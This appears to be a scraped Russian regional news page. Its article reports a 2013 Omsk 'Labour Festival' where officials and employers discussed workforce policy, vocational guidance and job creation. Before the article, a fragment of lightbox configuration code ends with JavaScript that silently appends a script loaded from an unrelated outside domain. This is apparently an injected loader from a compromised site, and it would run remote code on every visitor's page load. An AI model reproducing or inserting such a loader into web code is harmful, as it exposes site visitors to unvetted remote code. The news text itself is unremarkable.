, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
19 ноября, 2013 Новости региона

В Омской области обсудили перспективы региональной кадровой политики

Перспективы кадровой региональной политики были в центре внимания сегодня, 19 ноября, на Празднике труда, который проходит в Омской области. В мероприятии приняли участие представители Правительства региона, профсоюзов, работодатели, руководители образовательных учреждений, научная общественность. Как отметил в своем выступлении первый заместитель Председателя Правительства Омской области Вячеслав Синюгин, создание новых рабочих мест, привлечение высококвалифицированных кадров в экономику является одним из приоритетов в деятельности региональных властей. И от того, насколько успешно будут решаться эти задачи, зависит эффективность работы Правительства Омской области, отраслевых министерств и ведомств. «Мы имеем в Омской области высокий интеллектуальный и производственный потенциал – более 1 миллиона экономически активного населения. Хочу поблагодарить работодателей за то, что они активно создают дополнительные рабочие места на своих предприятиях», — подчеркнул В.Синюгин.

По словам Министра труда и социального развития региона Михаила Дитятковского, Праздник труда призван пропагандировать рабочие профессии, направлен на возрождение трудовых династий. Серьезное внимание уделяется профессиональному обучению и профессиональной ориентации. Готовится соответствующий проект постановления Правительства об организации профессиональной ориентации в Омской области. «Мы говорим о том, как именно работодатель должен участвовать в позиционировании рабочих профессий и специальностей, кадровой политике, подборе персонала», — сообщил Михаил Дитятковский. Также по его мнению, реализация Стратегии социально-экономического развития Омской области до 2025 года, как и Концепции развития отношений в сфере труда и занятости населения должна осуществляться совместно всеми сторонами социального партнерства — властью, работодателями, профсоюзами. Только совместными действиями можно рассчитывать на достижение конкретных результатов в развитии каждого предприятия и омской экономики в целом.

Президент регионального объединения работодателей Владимир Березовский считает, что подготовка молодых кадров должна вестись с учетом долгосрочных перспектив развития и кадровой потребности экономики, активного взаимодействия работодателей с учреждениями профессионального образования. Важное направление — привлечение в Омскую область трудовых ресурсов из числа соотечественников, проживающих за рубежом, содействие занятости сельской молодежи. В рамках мероприятия состоялись награждение победителей региональных этапов конкурсов «Работодателям — молодые кадры» и «Лучший по профессии».

 

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Новости региона